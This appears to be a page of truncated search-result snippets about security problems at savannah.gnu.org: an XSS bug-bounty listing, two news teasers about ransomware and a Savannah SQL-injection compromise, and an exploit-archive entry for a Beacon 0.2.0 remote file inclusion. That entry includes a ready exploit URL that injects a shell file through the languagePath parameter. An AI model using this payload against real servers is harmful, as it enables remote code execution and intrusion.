savannah.gnu.org XSS vulnerability

Open Bug Bounty ID: OBB-636261 Description| Value ---|--- Affected Website:| savannah.gnu.org Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

Week in Security: Wikileaks Extravaganza, New Ransomware and Open-Source Attacks

It was difficult to go anywhere this week without hearing about the flurry of activity surrounding the Wikileaks data dump. A slew of denial-of-service attacks followed soon after, while new ransomware and attacks on open-source software filled out the rest of the week’s news. Read on for the wee...

Savannah GNU Site Compromised

A site belonging to the Savannah GNU free software archive was attacked recently, leading to a compromise of encrypted passwords and enabling the attackers to access restricted project material. The compromise was the result of a SQL injection attack against the savannah.gnu.org site within the...

Beacon 0.2.0 - 'splash.lang.php' Remote File Inclusion

Beacon = 2.0Remot file inclusion languagePath Download script : http://download.savannah.gnu.org/releases/beacon/beacon020.zip Thanks Str0ke Exploit: http://victime.com/pbeaconpath/beacon/language/1/splash.lang.php?languagePath=shell.txt? Discovered by ThE TiGeR MiroTiger100atHotmaildotcom...